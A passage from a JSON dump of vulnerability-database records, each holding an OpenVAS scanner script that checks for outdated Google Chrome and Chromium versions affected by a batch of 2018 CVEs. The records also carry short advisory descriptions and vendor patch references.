Extensions.\n\n - Restrictions bypass in the debugger extension API.\n\n - Incorrect escaping of MathML in Blink.\n\n - Password fields not taking advantage of OS protections in Views.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can potentially\n result in the execution of arbitrary code or even enable full remote code\n execution capabilities and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 67.0.3396.62\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 67.0.3396.62 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\");\n script_xref(name:\"URL\", value:\"https://www.google.co.in/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"67.0.3396.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"67.0.3396.62\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:51", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310813504", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813504", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Mac OS X", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Mac OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813504\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 11:46:46 +0530 (Wed, 30 May 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Mac OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use after free in Blink.\n\n - Type confusion in Blink.\n\n - Overly permissive policy in WebUSB.\n\n - Heap buffer overflow in Skia.\n\n - Use after free in indexedDB.\n\n - uXSS in Chrome on iOS.\n\n - Out of bounds memory access in WebRTC, V8 and PDFium.\n\n - Incorrect mutability protection in WebAssembly.\n\n - Use of uninitialized memory in WebRTC.\n\n - URL spoof in Omnibox.\n\n - Referrer Policy bypass in Blink.\n\n - UI spoofing in Blink.\n\n - Leak of visited status of page in Blink.\n\n - Overly permissive policy in Extensions.\n\n - Restrictions bypass in the debugger extension API.\n\n - Incorrect escaping of MathML in Blink.\n\n - Password fields not taking advantage of OS protections in Views.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can potentially\n result in the execution of arbitrary code or even enable full remote code\n execution capabilities and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 67.0.3396.62\n on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 67.0.3396.62 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\");\n script_xref(name:\"URL\", value:\"https://www.google.co.in/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"67.0.3396.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"67.0.3396.62\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:56", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-15T00:00:00", "id": "OPENVAS:1361412562310874678", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874678", "title": "Fedora Update for chromium FEDORA-2018-7c80aaef26", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7c80aaef26_chromium_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for chromium FEDORA-2018-7c80aaef26\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874678\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-15 05:59:24 +0200 (Fri, 15 Jun 2018)\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6148\",\n \"CVE-2018-6147\", \"CVE-2018-6145\", \"CVE-2018-6144\", \"CVE-2018-6143\",\n \"CVE-2018-6142\", \"CVE-2018-6141\", \"CVE-2018-6140\", \"CVE-2018-6139\",\n \"CVE-2018-6138\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for chromium FEDORA-2018-7c80aaef26\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"chromium on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7c80aaef26\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RDQLVQB572536ED7VKYFV62WTSNYGL75\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~67.0.3396.79~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:42", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2018-06-05T00:00:00", "id": "OPENVAS:1361412562310851772", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851772", "title": "SuSE Update for chromium openSUSE-SU-2018:1484-1 (chromium)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2018_1484_1.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# SuSE Update for chromium openSUSE-SU-2018:1484-1 (chromium)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851772\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-05 14:03:22 +0530 (Tue, 05 Jun 2018)\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for chromium openSUSE-SU-2018:1484-1 (chromium)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"insight\", value:\"This update for chromium to version 66.0.3359.181 fixes the following\n issues:\n\n The following security issues were fixed (boo#1095163):\n\n * CVE-2018-6123: Use after free in Blink.\n\n * CVE-2018-6124: Type confusion in Blink.\n\n * CVE-2018-6125: Overly permissive policy in WebUSB.\n\n * CVE-2018-6126: Heap buffer overflow in Skia.\n\n * CVE-2018-6127: Use after free in indexedDB.\n\n * CVE-2018-6128: uXSS in Chrome on iOS.\n\n * CVE-2018-6129: Out of bounds memory access in WebRTC.\n\n * CVE-2018-6130: Out of bounds memory access in WebRTC.\n\n * CVE-2018-6131: Incorrect mutability protection in WebAssembly.\n\n * CVE-2018-6132: Use of uninitialized memory in WebRTC.\n\n * CVE-2018-6133: URL spoof in Omnibox.\n\n * CVE-2018-6134: Referrer Policy bypass in Blink.\n\n * CVE-2018-6135: UI spoofing in Blink.\n\n * CVE-2018-6136: Out of bounds memory access in V8.\n\n * CVE-2018-6137: Leak of visited status of page in Blink.\n\n * CVE-2018-6138: Overly permissive policy in Extensions.\n\n * CVE-2018-6139: Restrictions bypass in the debugger extension API.\n\n * CVE-2018-6140: Restrictions bypass in the debugger extension API.\n\n * CVE-2018-6141: Heap buffer overflow in Skia.\n\n * CVE-2018-6142: Out of bounds memory access in V8.\n\n * CVE-2018-6143: Out of bounds memory access in V8.\n\n * CVE-2018-6144: Out of bounds memory access in PDFium.\n\n * CVE-2018-6145: Incorrect escaping of MathML in Blink.\n\n * CVE-2018-6147: Password fields not taking advantage of OS protections in\n Views.\n\n Additional changes:\n\n * Autoplay: Force enable on desktop for Web Audio\n\n This update enables the 'Strict site isolation' feature for a larger\n percentage of users. This feature is a mitigation against the Spectre\n vulnerabilities. It can be turned on via:\n chrome://flags/#enable-site-per-process It can be disabled via:\n chrome://flags/#site-isolation-trial-opt-out\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-546=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-546=1\");\n script_tag(name:\"affected\", value:\"chromium on openSUSE Leap 42.3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1484_1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00000.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSELeap42.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~67.0.3396.62~161.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~67.0.3396.62~161.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~67.0.3396.62~161.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~67.0.3396.62~161.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~67.0.3396.62~161.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310813503", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813503", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Linux", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Linux\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813503\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 11:46:15 +0530 (Wed, 30 May 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use after free in Blink.\n\n - Type confusion in Blink.\n\n - Overly permissive policy in WebUSB.\n\n - Heap buffer overflow in Skia.\n\n - Use after free in indexedDB.\n\n - uXSS in Chrome on iOS.\n\n - Out of bounds memory access in WebRTC, V8 and PDFium.\n\n - Incorrect mutability protection in WebAssembly.\n\n - Use of uninitialized memory in WebRTC.\n\n - URL spoof in Omnibox.\n\n - Referrer Policy bypass in Blink.\n\n - UI spoofing in Blink.\n\n - Leak of visited status of page in Blink.\n\n - Overly permissive policy in Extensions.\n\n - Restrictions bypass in the debugger extension API.\n\n - Incorrect escaping of MathML in Blink.\n\n - Password fields not taking advantage of OS protections in Views.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can potentially\n result in the execution of arbitrary code or even enable full remote code\n execution capabilities and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 67.0.3396.62\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 67.0.3396.62 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\");\n script_xref(name:\"URL\", value:\"https://www.google.co.in/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"67.0.3396.62\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"67.0.3396.62\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:41", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2018-07-26T00:00:00", "id": "OPENVAS:1361412562310851821", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851821", "title": "SuSE Update for Chromium openSUSE-SU-2018:2055-1 (Chromium)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2018_2055_1.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# SuSE Update for Chromium openSUSE-SU-2018:2055-1 (Chromium)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851821\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-26 06:00:59 +0200 (Thu, 26 Jul 2018)\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\",\n \"CVE-2018-6148\", \"CVE-2018-6149\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for Chromium openSUSE-SU-2018:2055-1 (Chromium)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"insight\", value:\"This update for Chromium to version 67.0.3396.99 fixes multiple issues.\n\n Security issues fixed (bsc#1095163):\n\n - CVE-2018-6123: Use after free in Blink\n\n - CVE-2018-6124: Type confusion in Blink\n\n - CVE-2018-6125: Overly permissive policy in WebUSB\n\n - CVE-2018-6126: Heap buffer overflow in Skia\n\n - CVE-2018-6127: Use after free in indexedDB\n\n - CVE-2018-6129: Out of bounds memory access in WebRTC\n\n - CVE-2018-6130: Out of bounds memory access in WebRTC\n\n - CVE-2018-6131: Incorrect mutability protection in WebAssembly\n\n - CVE-2018-6132: Use of uninitialized memory in WebRTC\n\n - CVE-2018-6133: URL spoof in Omnibox\n\n - CVE-2018-6134: Referrer Policy bypass in Blink\n\n - CVE-2018-6135: UI spoofing in Blink\n\n - CVE-2018-6136: Out of bounds memory access in V8\n\n - CVE-2018-6137: Leak of visited status of page in Blink\n\n - CVE-2018-6138: Overly permissive policy in Extensions\n\n - CVE-2018-6139: Restrictions bypass in the debugger extension API\n\n - CVE-2018-6140: Restrictions bypass in the debugger extension API\n\n - CVE-2018-6141: Heap buffer overflow in Skia\n\n - CVE-2018-6142: Out of bounds memory access in V8\n\n - CVE-2018-6143: Out of bounds memory access in V8\n\n - CVE-2018-6144: Out of bounds memory access in PDFium\n\n - CVE-2018-6145: Incorrect escaping of MathML in Blink\n\n - CVE-2018-6147: Password fields not taking advantage of OS protections in\n Views\n\n - CVE-2018-6148: Incorrect handling of CSP header (boo#1096508)\n\n - CVE-2018-6149: Out of bounds write in V8 (boo#1097452)\n\n The following tracked packaging changes are included:\n\n - Require ffmpeg = 4.0 (boo#1095545)\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-759=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-759=1\");\n script_tag(name:\"affected\", value:\"Chromium on openSUSE Leap 42.3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2055_1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00032.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSELeap42.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~67.0.3396.99~161.4\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~67.0.3396.99~161.4\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~67.0.3396.99~161.4\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~67.0.3396.99~161.4\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~67.0.3396.99~161.4\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:00", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", 